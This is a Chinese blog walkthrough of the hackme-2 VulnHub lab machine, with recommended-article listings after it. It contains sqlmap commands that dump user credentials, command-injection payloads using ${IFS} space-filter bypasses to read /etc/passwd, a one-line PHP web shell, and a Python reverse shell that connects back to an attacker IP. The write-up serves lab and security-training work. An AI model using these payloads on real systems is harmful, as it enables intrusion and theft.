hackme-2靶机渗透详解

最新推荐文章于 2023-10-17 17:55:48 发布
最新推荐文章于 2023-10-17 17:55:48 发布
阅读量329 收藏 1
点赞数
文章标签: 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47372600/article/details/131164268
版权

靶机描述

靶机基本信息:

链接 https://www.vulnhub.com/entry/hackme-2,618/
难度 中等

靶机基本介绍:
hackme2”是一个中等难度的关卡。这是hackme系列的第二部分,其中有更多的控件用于阻止恶意攻击。此外,你还必须跳出框框来利用这些漏洞。目标是通过web漏洞获得有限的权限访问,并随后以根用户身份升级权限。

环境搭建

1.下载并导入靶机

打开vmware–文件–打开–hackme2-DHCP.ova
5930f994b95c406a8e48b8e281e0782a.png

2.启动靶机

点击 ▶靶机,开启成功
19c63222fbdd4dc797e300d3da4d82c0.png

靶机渗透

一、 信息收集

  1. 主机发现
arp-scan -l

9538c0cb600b4ae0ac94c1d715a5acdc.png
2. 端口扫描

masscan --rate=100000 -p 0-65535 192.168.30.207

7a21d94b83fe4b3c9c0e9daedc26c526.png

  1. 详细扫描
nmap -T4 -sV -O -p 22,80 192.168.30.207

940eb70b18aa4ebbaf7f45c32a5228a9.png
4. gobuster进行目录扫描

gobuster dir -e -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,zip,html -u http://192.168.30.207 -t 30

46f918d7db07462dbcb2a984362c2836.png
5. 网站指纹识别

whatweb http://192.168.30.207

17fe1657054645abaa0670c04ac22631.png
二、 漏洞挖掘

sql注入

  1. 进入主页发现是登录页面,没有用户名及密码,但是页面有注册链接,进行注册用户

ff81a603d15945929a41207ae928f2ed.png
2.使用所注册的用户登陆成功
5c6976c0d0c24387a1444a182b45d63e.png

  1. 利用sqlmap进行测试是否具有sql注入漏洞
sqlmap -u 'http://192.168.30.207/welcome.php' --data="search=OSINT" --cookie="PHPSESSID=boujv14h358os0cru6q5afevt9"  --level=3 --risk=3

7b6be88734f14427ba3e648ed96eaaf9.png

3f98168fb86d45f499e861ecc52d7e49.png
可以看出该出存在sql注入漏洞
4. 查询当前数据库

sqlmap -u 'http://192.168.30.207/welcome.php' --data="search=OSINT" --dbs --cookie="PHPSESSID=boujv14h358os0cru6q5afevt9" --dbs --tamper space2comment.py --level=5 --risk=3

03d91f75294f4adf9aa5afb5cb615852.png
765a80d9aed849dd9fef5a672e6fe7a3.png
在这里插入图片描述在这里插入图片描述
5. 查询当前数据库

sqlmap -u 'http://192.168.30.207/welcome.php' --data="search=OSINT" --dbs --cookie="PHPSESSID=boujv14h358os0cru6q5afevt9" --current-db --tamper space2comment.py --level=5 --risk=3

02131f4675d44ba39cbd8e9c07602348.png
c0959e11aff54abcb7843e2d4d198843.png
6. 查询当前数据中所有的表

sqlmap -u 'http://192.168.30.207/welcome.php' --data="search=OSINT" --dbs --cookie="PHPSESSID=boujv14h358os0cru6q5afevt9" --tamper space2comment.py --level=5 --risk=3 -D webapphacking --tables

e95d1840f5d241bf89cd5646992b8ca5.png
712a4041e6c344df99ffbeb5c053624c.png
7. 查询users表中所有的列

1sqlmap -u 'http://192.168.30.207/welcome.php' --data="search=OSINT" --dbs --cookie="PHPSESSID=boujv14h358os0cru6q5afevt9" --tamper space2comment.py --level=5 --risk=3 -D webapphacking -T users --columns

2fb526ac2d5540a48c39401b0aa64d7d.png
d73b96e655254c9f93a22e380ff32c92.png
8. 查询users表中的数据

sqlmap -u 'http://192.168.30.207/welcome.php' --data="search=OSINT" --dbs --cookie="PHPSESSID=boujv14h358os0cru6q5afevt9" --tamper space2comment.py --level=5 --risk=3 -D webapphacking -T users -C user,name,password --dump

18e3be34220e42ac98480515a54ff29c.png
a6b07f7b31084cf7a52b9af618b87586.png
然后我们对用户superadmin进行解密

2386acb2cf356944177746fc92523983      #Uncrackable

652de35973894b68b8645160419fbdb8.png
文件上传漏洞

我们对刚所得到的superadmin用户进行登录

在这里发现了文件上传点,也发现了一处查询用户状态入口
aae52532e58549138fbb92429890c21f.png

2. 经过验证,上传假图片头木马和图片马时,修改后缀均已失败告终,可以上传图片可以成功

a038a25c540549b3a8a42c0ea7982fa5.png
6a0662e3ac5243ef90170fd359ca20ba.png
虽然可以上传图片,但是uploads文件夹并不存在,而且我们还没有找到文件包含点,所以我们需要继续寻找其他漏洞,换种解题思路

命令注入漏洞

手工测试

Last Name 输入框中可能存在命令执行漏洞
69b774e14b2a4446920d51da3aa4a153.png

进行验证

a28419c0d6f242f597bf3b33dc11c22c.png
此处确实含有命令注入漏洞
407bb76e295b4d0ea82258c49bbd478a.png
但是在进一步的验证中发现命令执行却不起作用,所以在这里猜测可能是由于过滤空格导致的

#命令执行绕过空格的方法:
<  		 -->   重定向,如cat<flag.php
<>       -->   重定向,如cat<>flag.php
%09 	 -->   需要php环境,如cat%09flag.php
${IFS}	 -->   单纯cat$IFS2,IFS2被bash解释器当做变量名,输不出来结果,加一个{}就固定了变量名,如cat${IFS2}flag.php$IFS$9 	 -->   后面加个$与{}类似,起截断作用,$9是当前系统shell进程第九个参数持有者,始终为空字符串,如cat$IFS2$9flag.php

其中两种方法均可以成功绕过

system('cat${IFS}/etc/passwd')
system('cat$IFS$9/etc/passwd')

44c4a872a5dd439589b98054ae756c37.png
4da2e4560c1345ed87bee9700ee56047.png


三、 漏洞利用

可以进行执行命令,所以我们可以尝试查看各种有用文件

在查看的过程中我们发现,当前页面welcomeadmin.php源码泄露。我们进行查看,发现了图片上传后的路径,并且可以看出这里并且可以看到并没有过滤asp,aspx后缀文件

cat${IFS}welcomeadmin.php
文件上传路径:
/var/www/html/uploads/year2020/
即:http://192.168.30.207/uploads/year2020/

0644c68d68304e228f71940a11ff157f.png

上传一句话木马,蚁剑连接失败

这里我们可以进行上传asp与aspx木马文件,并用蚁剑进行连接,但是结果以失败告终
3e5f5bb2521c4648908d6b6a7b89dd0f.png

475e4832fd464e3185c12e978333fab9.png
木马文件上传成功

对上传的文件访问并用菜刀连接

c832896ada85432c8b08663177a4b2f6.png
68c7d96779904ff4a7526ce30baad5a6.png

换种思路 命令执行+文件上传

我们现在可以进行命令执行(执行命令反弹shell失败,可能是不存在这种反弹shell方法,或者是我执行有误,并没有执行成功),也知道了文件上传后的路径,我们可以利用命令执行漏洞修改上传到服务器的文件名,然后进行反弹shell

4.1 前面我们上传的phpinfo.jpg文件,我我们尝试修改后缀,并进行访问

1system('mv${IFS}/var/www/html/uploads/year2020/phpinfo.jpg${IFS}/var/www/html/uploads/year2020/phpinfo.php')

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ZNqZTjzX-1686537915457)(https://cdn.nlark.com/yuque/0/2023/png/34636936/1686537495528-2477deb8-900a-4609-9271-5f7ec17269bd.png#averageHue=%23f9f7f7&clientId=u5ee4e850-be9a-4&from=paste&height=506&id=u0b55ddbb&originHeight=759&originWidth=1604&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=199902&status=done&style=none&taskId=uf4fa1bf2-293d-4b34-892e-bf07c9c30fd&title=&width=1069.3333333333333)]


4.2成功访问phpinfo页面

http://192.168.30.207/uploads/year2020/phpinfo.php

46f39476fcf4456c8784313818e42d70.png

反弹shell

5.1上传图片马sysexec.jpg

#图片马中的脚本:
<?php @system($_GET[cmd]);?>

18eb8dc169db43bfae4bc741b0975bcb.png
5.2 利用命令注入漏洞进行修改后缀

system('mv${IFS}/var/www/html/uploads/year2020/sysexec3.jpg${IFS}/var/www/html/uploads/year2020/sysexec3.php')

c8b697fdd4c949029355e690d316f3be.png
5.3 借用hackbar工具访问url,反弹shell

这里给大家推荐一个在线生成反弹shell命令的网站
https://weibell.github.io/reverse-shell-generator/

192.168.30.207/uploads/year2020/sysexec3.php?cmd=export RHOST="192.168.30.182";
export RPORT=8888;
python -c 'import sys,socket,os,pty;
s=socket.socket();
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));
[os.dup2(s.fileno(),fd) for fd in (0,1,2)];
pty.spawn("/bin/sh")'

345f5ad4713e4109aaf9619b2fb24594.png
成功反弹shell

84f2bf86e3954172ad3e223c279375a6.png
四、 提权

  1. 先用python打开一个标准的shell
python -c 'import pty;pty.spawn("/bin/bash")'

a986be4bf1524f16b6702e55922009fa.png
2. 我们筛选出可登录的用户

cat /etc/passwd | grep bash

d7e66b78dc5a4971ba56ece76d30424e.png
3. 来到home/目录,发现有一个legacy目录(并不是用户)
14b53def25fc4ddeab3e8d1124c5cb3a.png
4. 进入了legacy目录,发现可执行的二进制文件,执行,提权成功

55380aef05fe4f17a719221dd37924c9.png
实验总结

这个靶机的难度适中,通过这个靶机的联系,感觉更可以增强自己对这些漏洞执行的连贯性,靶机主要考察了目录扫描,sql注入(这里要绕过空格过滤),文件上传与命令执行的结合,反弹shell及提权。该靶机可以串通各部分知识,值得一做

BearSec
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BLE_HackMe:低功耗蓝牙低硬件HackMe
03-13
低功耗蓝牙低硬件HackMe 该项目旨在介绍BLE协议及其安全性基础。 具有蓝牙接口的标准Windows 10计算机将模拟各种BLE设备-在无线电层上的工作原理与真实设备完全相同。 在一系列复杂性越来越高的任务中,允许您熟悉BLE广告,信标,连接,控制会说话的BLE智能灯泡,对通信进行反向工程,暴力密码,甚至破解真正的智能锁。 系统要求 Windows 10周年纪念版 蓝牙适配器-应该可以与大多数标准笔记本电脑内置的适配器一起使用,而不必与外部加密狗一起使用 这些任务被设计为使用免费的Android移动应用程序解决,并通过BLE连接到模拟设备(iOS具有有限的低级BLE功能)。 也可以使用其他BLE工具,例如在Linux或Mac上运行,但是HackMe指令中未涵盖详细信息。 安装 二进制版本在Microsoft Store中可用: 从源头建造 在Visual Studio中构建 要从源
靶机渗透练习14-hackme2
hirak0的博客
04-15 993
靶机描述 靶机地址:https://www.vulnhub.com/entry/hackme-2,618/ Description ‘hackme2’ is a medium difficulty level box. This is the second part of the hackme series where more controls are in place do deter malicious attacks. In addition, you will have to think ou
os2子系统的hackme
06-16
一个os2子系统的hackme <br>
Hackme:Hackme is a network security answer platform,Hackme网络安全答题平台
04-27
Hackme Hackme is a network security answer platform,Hackme网络安全答题平台 sec 为第一个版本,大家多多支持。 由于之前写的时候是用于网络安全知识普及性质的线下赛,所以有些内容不适合线上CTF,需要一些修改。 以后有时间再改啦,相信你们自己能改也能写,哈哈。 1、使用前先配置好OT数据库。 配置文件的位置为Application\Common\Conf\config.php /* 默认数据库配置为如下所示,按实际情况修改 */ 'DB_TYPE' => 'mysql', // 数据库类型 'DB_HOST' => '127.0.0.1', // 服务器地址 'DB_NAME' => 'ot', // 数据库名 'DB_USER' => 'root', // 用户名 'DB_PWD' => 'root', /
hackme.inndy.tw的rop2题目
10-15
这是https://hackme.inndy.tw/scoreboard/的rop2题目如果网站被墙或者关闭请从这里下载
Vulnhub--hackme2
weixin_45168704的博客
06-12 142
拿下hackme2
靶机渗透 HACKME-2 (详细渗透,适合新手渗透
君莫hacker的博客
09-06 3482
靶机HACKME:2的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-2,618/ 作者 x4bx54 发布日期 2020年12月6日 难度 中等 靶机基本介绍: hackme2”是一个中等难度的关卡。这是hackme系列的第二部分,其中有更多的控件用于阻止恶意攻击。此外,你还必须跳出框框来利
hackme-2
qq_45747465的博客
06-12 108
打靶--hackme-2
Hackme2靶机总结
qq_45301512的博客
12-17 341
(2) 先用最普通的测post的跑一下,发现不行,根据最后的提示,可以加上 –level 参数 和 –tramper=space2comment 参数。看了网上的答案,发现/home/legacy下存在一个touchmenot可执行文件,运行就能提权。使用msfvenom生成一个php的tiquan.php,上传到/var/www/html目录下。=eval 代替
HACKME-2 打靶
weixin_57315671的博客
06-16 71
靶机描述:靶机地址:https://www.vulnhub.com/entry/hackme-2,618/超级管理员用户superadmin的密码为Uncrackable。开启一台kali作为攻击机,将两台机子均设为NAT模式。2. 注册用户,admin,密码为123456。1.进入主页发现是登录页面,且可以注册用户。6.浏览器访问 空白页面说明上传成功。超级管理员登录,发现有文件上传点。尝试union联合注入。获取数据库名等基本信息。5.上传文件并改后缀。7.kali开启监听。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
vulnhub靶场之hackme2-DCHP
weixin_42478365的博客
06-04 694
sql注入(空格绕过),命令执行漏洞(空格绕过)、SUID提权、Burp联动xray
hackme_2 靶机详细讲解
最新发布
m0_70099896的博客
10-17 164
前面的空格过滤有意思但是结尾的提权只是找到个文件就提权了高开低走,烂尾了。。。。。
CTF之Hackademic RTB2 靶机渗透(万能密码 端口敲门 joomla1.5 SQL注入)
afei001
08-22 804
练习环境     攻击机:kali     靶机:Hackademic: RTB2     下载地址:https://download.vulnhub.com/hackademic/Hackademic.RTB2.zip      1.发现靶机,端口扫描 root@kali:~# netdiscover -r 100.100.100.0/16 _____________________________________________________________________________ .
Vulnhub-hackme2
GALi_233的博客
03-20 3884
Description ‘hackme2’ is a medium difficulty level box. This is the second part of the hackme series where more controls are in place do deter malicious attacks. In addition, you will have to think out of the box to exploit the vulnerabilites. The goal is
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值